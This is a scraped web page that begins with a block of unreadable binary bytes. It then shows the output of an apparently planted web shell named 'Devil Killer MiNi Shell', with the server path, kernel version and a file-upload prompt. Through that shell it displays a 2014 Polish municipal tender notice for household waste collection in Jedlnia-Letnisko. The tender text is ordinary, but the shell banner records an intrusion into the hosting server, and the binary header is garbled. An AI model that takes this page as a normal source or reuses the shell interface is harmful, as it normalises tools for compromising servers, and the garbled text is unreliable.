JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140529/182126-N-2014.html

<p class="kh_header"><b>Jedlnia-Letnisko: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy na terenie Gminy Jedlnia-Letnisko</b><br>
<b>Numer ogłoszenia: 182126 - 2014; data zamieszczenia: 29.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Jedlnia Letnisko , ul. Radomska 43, 26-630 Jedlnia-Letnisko, woj. mazowieckie, tel. 048 3848470, faks 048 3848470 w. 222.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jedlnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy na terenie Gminy Jedlnia-Letnisko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług polegających na odbiorze i zagospodarowaniu odpadów komunalnych powstających w gospodarstwach  domowych na terenie Gminy Jedlnia-Letnisko. Obsługą odbioru odpadów objęte są nieruchomości zamieszkałe oraz punkt selektywnej zbiórki odpadów komunalnych -PSZOK.
Powierzchnia Gminy Jedlnia-Letnisko wynosi 65,57 km2 i obejmuje 21 sołectw.
W okresie realizacji przedmiotu zamówienia, Zamawiający przewiduje, że:
Liczba gospodarstw  na terenie gminy wynosić będzie 3349 szt. ? 5 %, w tym: 
jednoosobowe - 403 szt. ? 5 %
2-3 osobowe - 1334 szt. ? 5 %
4 osobowe i więcej - 1612 szt. ? 5 %
oraz zabudowę wielorodzinną - występuje 2 obiekty, który należy wyposażyć  w 3 pojemniki 1,1 m3 -dwa do segregacji, jeden na odpady zmieszane
Ilość mieszkańców zameldowanych na pobyt stały: 12 361 osób wg stanu na dzień 31.03.2014 
Podział ilości gospodarstw na poszczególne sołectwa:   
Sołectwo	Liczba gospodarstw domowych
Aleksandrów 71
Antoniówka 166
Cudnów 80
Dawidów 35
Groszowice 259
Gzowice-Kolonia 24
Gzowice-Folwark 25
Gzowice	77
Jedlnia-Letnisko 1183
Lasowice	95
Maryno	55
Myśliszewice	89
Natolin	52
Piotrowice	44
Rajec Poduchowny	254
Rajec Szlachecki	256
Siczki	98
Słupica	115
Sadków Górki	120
Sadków	104
Wrzosów	140
Kolonka	7
Przewidywana ilość odpadów komunalnych powstających w gospodarstwach domowych na posesjach z terenu gminy Jedlnia-Letnisko w stosunku rocznym wynosi: ok 1300 Mg ? 5 % w tym: zmieszane 1000 Mg, suche 300 Mg, niebezpieczne 3 Mg ? 5 %  
Przedmiot zamówienia nie obejmuje odbioru odpadów ze: szkół, przedsiębiorstw prowadzących działalność gospodarczą na terenie gminy Jedlnia-Letnisko, a także nieruchomości niezamieszkałych.
1.	RODZAJE ODEBRANYCH I ZAGOSPODAROWANYCH ODPADÓW, WYPOSAŻENIE NIERUCHOMOŚCI W POJEMNIKI I WORKI, CZĘSTOTLIWOŚĆ ODBIORU:
Rodzaje odpadów komunalnych odebranych z gospodarstw domowych (od 01.07.2014 r. do 31.12.2014 r.) w ramach świadczonej usługi oraz wyposażenie właścicieli nieruchomości w worki i pojemniki spełniające wymagania higieniczno-sanitarne z podziałem na:
odpady suche (opakowaniowe).: 
- opakowania szklane, tj. szkło białe i kolorowe gromadzone w workach, z częstotliwością opróżniania co osiem tygodni.
- opakowania z plastiku, PET-y, folie, opakowania metalowe, opakowania papierowe, tekturę, opakowania tetra pak, gazety, książki, tekstylia, drewno) - gromadzone w workach, z częstotliwością opróżniania co cztery tygodnie. 
Wykonawca zobowiązany jest odebrać wszystkie odpady zebrane selektywnie wystawione w terminie wskazanym w harmonogramie.
Wykonawca ma obowiązek dostarczyć do każdego gospodarstwa dwa worki na odpady suche oraz jeden worek na odpady szklane a w kolejnych miesiącach na wymianę. Worki powinny mieć odpowiednią wytrzymałość zarówno na przebicie jak i na rozciąganie oraz mocny i trwały zgrzew. Powinny posiadać nadruk określający jakie odpady w nim umieszczać.
Ponadto Wykonawca ma obowiązek dostarczyć do Urzędu Gminy zapas worków na odpady suche w ilości 300 szt. i na odpady szklane w ilości 200 szt. oraz uzupełniać ten zapas na wezwanie zamawiającego.
odpady mokre- zmieszane inne odpady komunalne, tj. odpady kuchenne, resztki i obierki z owoców i warzyw, zużyte ręczniki papierowe i chusteczki, pampersy, mokry papier itp. - gromadzone w pojemnikach, z częstotliwością opróżniania co cztery tygodnie. 
Wykonawca ma obowiązek dostarczyć do każdej nieruchomości pojemnik o pojemności: 120 l do gospodarstwa, w którym zamieszkuje do 3 osób włącznie oraz 240 l do gospodarstwa zamieszkiwanego przez 4 osoby i więcej oraz 3 pojemniki 1,1 do zabudowy wielorodzinnej
Pojemniki z tworzywa sztucznego o pojemności 120 l lub 240 l oraz 1,1 m3 powinny być: kompletne i zdatne do użytkowania, być odporne na promienie słoneczne i  niskie temperatury, wyposażone w kółka, posiadać szczelnie zamykaną klapę, posiadać nadruk określający jaki odpad można w nich umieszczać. Wykonawca ma obowiązek wyposażyć gospodarstwa domowe w pojemniki do 30 czerwca 2014 r.
Mieszkańcy są zobowiązani do wystawienia pojemnika do drogi umożliwiającej dojazd środkiem transportu przez Wykonawcę.
Odpady wskazane poniżej odbierane będą w następującej formie:
odpady wielkogabarytowe - w tym m.in.: stare meble, wózki dziecięce, sprzęt gospodarstwa domowego, deski, materace, opony itp. -z częstotliwością odbioru jeden  raz na rok, zbiórka mobilna w wyznaczonych miejscach - 8 wyznaczonych miejsc na terenie Gminy. Podstawiony kontener do zbiórki odpadów o min. pojemności 23 m3 - zbiórka pod nadzorem pracownika Wykonawcy.
odpady niebezpieczne - w tym m.in.: akumulatory, świetlówki, resztki farb, lakierów, rozpuszczalników, środków do impregnacji drewna, olejów mineralnych i syntetycznych, benzyn, leków, opakowania po środkach ochrony roślin i nawozach, opakowania po aerozolach - z częstotliwością odbioru jeden raz na rok, zbiórka mobilna w wyznaczonych miejscach - 8 wyznaczonych miejsc na terenie Gminy. Podstawiony kontener do zbiórki odpadów o min. pojemności 7 m3 - zbiórka pod nadzorem pracownika Wykonawcy.
odpady pochodzące ze zużytego sprzętu elektrycznego i elektronicznego - z częstotliwością odbioru jeden raz na rok, zbiórka mobilna w wyznaczonych miejscach - 7 wyznaczonych miejsc na terenie Gminy. Podstawiony kontener do zbiórki odpadów o min. pojemności 23 m3 - zbiórka pod nadzorem pracownika Wykonawcy.

W okresie między mobilnymi zbiórkami ww. odpady mieszkańcy będą mogli własnym transportem dowieźć do punktów selektywnej zbiórki odpadów komunalnych.
Wykonawca opracuje harmonogram wywozu odpadów komunalnych (mokrych, suchych, wielkogabarytowych, niebezpiecznych, i pochodzących ze zużytego sprzętu elektrycznego i elektronicznego). 
Po akceptacji w/w harmonogramów przez Zamawiającego, Wykonawca powiadomi o nich właścicieli (współwłaścicieli, zarządców, użytkowników) nieruchomości poprzez dostarczenie ich do każdego gospodarstwa domowego na terenie Gminy  Jedlnia-Letnisko w terminie do 25 czerwca 2014 r.
Harmonogram powinien zawierać w swojej treści kontakt telefoniczny do firmy w przypadku reklamacji nienależytego wykonania usługi, np. nieodebranych odpadów.
Wszelkie zmiany harmonogramu wymagają formy pisemnej, za wyjątkiem zmian jednorazowych wynikających z nadzwyczajnych sytuacji, np. powódź, gwałtowne opady śniegu, nieprzejezdna droga. We wszystkich przypadkach zmiana harmonogramu nastąpi po wcześniejszym uzgodnieniu między stronami. Dopuszcza się formę pisemną, email.
Punkt selektywnego zbierania odpadów komunalnych - PSZOK.
Zamawiający urządzi punkt selektywnego zbierania odpadów.
Wykonawca zobowiązany jest w ramach podpisanej umowy odbierać odpady gromadzone w kontenerach i pojemnikach PSZOK, tj:
1. Odpady zielone z pielęgnacji ogrodów i terenów zielonych - 2 kontenery o pojemności 7 m3 - kontener podstawiony przez Wykonawcę
2. Zużyte opony - 1 kontener o pojemności 7 m3 - kontener podstawiony przez Wykonawcę
3. Zużyty sprzęt elektryczny i elektroniczny oraz odpady wielkogabarytowe - 1 pojemnik o pojemności min. 23 m3 - kontener podstawiony przez Wykonawcę
4. Odpady remontowe - 1 kontener o pojemności 7 m3- własność Wykonawcy
5. Popiół - 1 kontener o pojemności 7 m3 - kontener podstawiony przez Wykonawcę
Wykonawca zobowiązany będzie do dostarczenia kontenerów - pojemników w zakresie wskazanym powyżej do Punktu Selektywnego Zbierania Odpadów Komunalnych.
Przeterminowane leki - 3 pojemniki o pojemności 50 l - własność Zamawiającego podstawione do dwóch aptek w Jedlni-Letnisko oraz do Ośrodka Zdrowia w Jedlni-Letnisko, opróżniane na każdorazowe, telefoniczne lub mailowe zlecenie Zamawiającego. 
Obowiązkiem Wykonawcy będzie zagospodarowanie odebranych na zgłoszenie telefoniczne z Punktu Selektywnego Zbierania Odpadów Komunalnych poprzez przekazanie ich do odzysku lub unieszkodliwiania zgodnie z obowiązującymi przepisami prawa. Raz w miesiącu Wykonawca musi przedstawić dowody potwierdzające tą czynność, tj. karty przekazania odpadów.
Planowane szacunkowe ilości odpadów pochodzących z PSZOK w skali półrocza:
odpady zielone z pielęgnacji ogrodów i terenów zielonych:  50 ton ? 5 %
zużyte opony - 10 ton ? 5 %
odpady pochodzące ze zużytego sprzętu elektrycznego i elektronicznego i wielko gabaryty : 10 ton ? 5 %
baterie: 100 kg ? 5 %
przeterminowane leki: 50 kg ? 5 %
odpady remontowe: 50 ton ? 5 %
popiół: 10 ton ? 5 %

2.	OBOWIĄZKI WYKONAWCY

W trakcie realizacji przedmiotu zamówienia Wykonawca zobowiązany będzie do:

1. Wykonania przedmiotu zamówienia zgodnie z obowiązującymi przepisami, w tym ustawą prawo ochrony środowiska, ustawą o odpadach oraz ustawą o utrzymaniu czystości i porządku w gminach oraz Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. (Dz. U. z 2013 r. poz. 122).
2. Prowadzenia dokumentacji związanej z działalnością objętą zamówieniem, tj. sporządzanie kwartalnych sprawozdań zgodnie z obowiązującym Rozporządzeniem.
a) zawierających informację o masie poszczególnych rodzajów odpadów oraz o sposobie ich zagospodarowania, wraz ze wskazaniem instalacji, do której zostały przekazane odebrane od właścicieli nieruchomości zmieszane odpady komunalne, odpady zielone oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania.  
b) zawierających informację o masie odpadów komunalnych ulegających biodegradacji: przekazanych na składowisko odpadów oraz nieprzekazanych do składowania na składowisku odpadów  i sposobie ich zagospodarowania.
3. Wykonawca zobowiązany będzie do monitorowania obowiązku ciążącego na gospodarstwie domowym w zakresie selektywnego zbierania odpadów komunalnych. W przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się  z obowiązku w zakresie segregacji odpadów, Wykonawca odbiera odpady jako zmieszane odpady komunalne. Wykonawca zobowiązany jest w terminie 2 dni od dnia zaistnienia opisanej sytuacji do pisemnego lub drogą elektroniczną poinformowania Zamawiającego o niewywiązywaniu się z obowiązków segregacji odpadów przez właściciela nieruchomości. Do informacji Wykonawca zobowiązany będzie załączyć dokumentację  umożliwiająca identyfikację nieruchomości i zdjęcie fotograficzne na poziomie umożliwiającym wydanie przez Zamawiającego decyzji administracyjnej naliczającej zmianę wysokości opłaty .
4. Wykonawca przedstawi Zamawiającemu jako załącznik do faktury miesięczne raporty z wykazem wszystkich gospodarstw od których zostały odebrane odpady. Raport zawierać powinien wykaz gospodarstw, które nie były umieszczone w wykazie, a odebrano od nich odpady komunalne oraz wykaz posesji z których zaprzestano odbierać odpady.
5. Wyposażenie gospodarstw w worki i pojemniki jest obowiązkiem Wykonawcy.
6. Wymiana dotycząca wielkości pojemnika, wymiana uszkodzonych i zużytych pojemników na sprawne i spełniające wymogi higieniczno-sanitarne oraz bieżące ich uzupełnianie należy zrealizować w terminie 5 dni roboczych od dnia otrzymania od Zamawiającego wezwania wystawionego za pośrednictwem faksu, emailu. Potwierdzenie realizacji zgłoszenia z dowodem przyjęcia, wymiany lub podstawienia pojemnika należy przesłać faxem lub emailem do Zamawiającego w terminie 14 dni od daty zgłoszenia.
W przypadku nie zachowania tego terminu, Zamawiający zastrzega sobie prawo do naliczenia kary umownej określonej w umowie i potrącenia jej  z najbliższej faktury. 
7. Wykonawca ma obowiązek przekazać do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych /RIPOK/ odebrane od gospodarstw domowych z terenu Gminy Jedlnia-Letnisko zmieszane odpady komunalne, odpady zielone oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania. 
8. Przekazywanie odebranych od właścicieli nieruchomości zamieszkałych selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów komunalnych zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013., poz. 21).
9. Wykonania usługi w sposób rozsądny i fachowy, nie powodujący żadnych niepotrzebnych przeszkód i niedogodności dla społeczeństwa.
3.	INNE OBOWIĄZKI WYKONAWCY
1. Opracowanie szczegółowej informacji zawierającej wykaz odpadów zaliczanych do segregacji i zaliczanych do odpadów mokrych /zmieszanych/. Informacja opracowana w celu  rozpropagowania wśród gospodarstw domowych, która ma być zamieszczona na odwrotnej stronie harmonogramów przekazywanych mieszkańcom do 30 czerwca 2014 r.
2. W trakcie realizacji przedmiotu zamówienia wykonawca zobowiązany jest do zapewnienia przez cały czas trwania umowy dostatecznej ilości środków technicznych, gwarantujących terminowe i jakościowe wykonanie zakresu rzeczowego usługi, w ilości minimum jak w złożonej w postępowaniu przetargowym ofercie,
3. Pojazdy specjalistyczne winny być bezpylne, w dobrym stanie technicznym, prawidłowo oznakowane oraz wyposażone w system monitoringu umożliwiający trwałe zapisywanie, odczytywanie danych o położeniu pojazdu i miejscach postojów. 
4. Transport odpadów wielkogabarytowych, odpadów umieszczonych w szczelnych workach plastikowych, może odbywać się pojazdami ciężarowymi.
5. Ilość pojazdów niezbędnych do należytego wykonania zamówienia, to minimum 5 pojazdów, w tym 1 pojazd przystosowany do wjazdu w wąskie uliczki, które mają szerokość do 3 m.
6. Zabezpieczyć przewożone odpady przed wysypaniem na drogę oraz przed wydzielaniem nieprzyjemnego zapachu.
7. Zachowanie właściwego stanu sanitarnego użytkowanych pojazdów (mycie, dezynfekcja) winno odbywać się w warunkach spełniających wygania z zakresu ochrony środowiska.
8. Wyposażenie własnych pracowników zajmujących się wywozem w odzież z widocznym logo firmy.
9. Okazywanie na żądanie Zamawiającego wszelkich dokumentów potwierdzających wykonanie przedmiotu umowy zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa.
10. Ponoszenie pełnej odpowiedzialności za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy.
11. Wykonawca zobowiązany jest także do zabrania odpadów leżących obok pojemników.
12. Przyjmowanie i rozpatrywania reklamacji związanych z prowadzoną przez siebie działalnością w zakresie wywozu nieczystości. 
Miejscem wykonania zamówienia jest teren gm. Jedlnia-Letnisko.
Zaleca się aby Wykonawca dokonał wizji lokalnej w terenie oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 5000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek zostanie uznany za spełniony jeżeli wykonawca udokumentuje że posiada uprawnienia (zezwolenia) niezbędne do wykonania zamówienia: - Wpis do rejestru działalności regulowanej, prowadzonej przez Wójta Gminy Jedlnia-Letnisko, o którym mowa w art. 9b ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku gminach w zakresie objętym przedmiotem zamówienia, - wpis do rejestru zbierających zużyty sprzęt elektryczny i elektroniczny, prowadzony przez Głównego Inspektora Ochrony Środowiska, wymaganego zgodnie z art. 7 ustawy z dnia 29 lipca 2005 r. o zużytym sprzęcie elektrycznym i elektronicznym. - Zezwolenie Starosty (właściwego ze względu na miejsce siedziby lub zamieszkania Wykonawcy) na prowadzenie działalności w zakresie zbierania odpadów i zezwolenie na przetwarzanie odpadów, wydane na podstawie art. 41 ust.1 , 2 i3 pkt. 2) ustawy z dnia 14 grudnia 2012r. o odpadach (Dz. U. 2013.21), - Umowę (lub promesę jej zawarcia) lub decyzję w zakresie recyklingu odpadów zgodnie z ustawą o odpadach (Dz. U. 2013.21) - na odbiór odpadów segregowanych,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Na potwierdzenie warunku posiadania wiedzy i doświadczenia wykonawca musi wykazać, że: - w okresie ostatnich 3 lat świadczył usługi /ciągłość usługi w okresie 1 roku/ w zakresie obsługi odbioru odpadów komunalnych z obszarów wiejskich zamieszkałych przez co najmniej 9.000 mieszkańców - minimalna masa odebranych odpadów to 1100 Mg /rocznie/, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie. Potwierdzenie spełnienie tego warunku na podstawie wystawionych referencji lub innych dokumentów potwierdzających należyte wykonanie usługi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	W celu spełnienia warunku wykonawca musi wykazać, że dysponuje co najmniej: - 2 pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych z funkcją kompaktującą, spełniające normę emisji spalin co najmniej EURO IV, - 2 pojazdami przystosowanymi do odbierania selektywnie zbieranych odpadów komunalnych z funkcją kompaktującą, a także co najmniej jeden pojazd do zbierania odpadów bez funkcji kompaktującej spełniające normę emisji spalin co najmniej EURO IV, - co najmniej jednym pojazdem do odbioru pojazdów komunalnych z zabudową hakową o pojemności kontenera 23 m3 z żurawiem samochodowym spełniający normę emisji spalin co najmniej EURO IV. Ocena spełniania warunku na podstawie wykazu potencjału technicznego, którym dysponuje Wykonawca.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku wykonawca musi wykazać, że posiada opłaconą polisę ubezpieczeniową odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 300 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

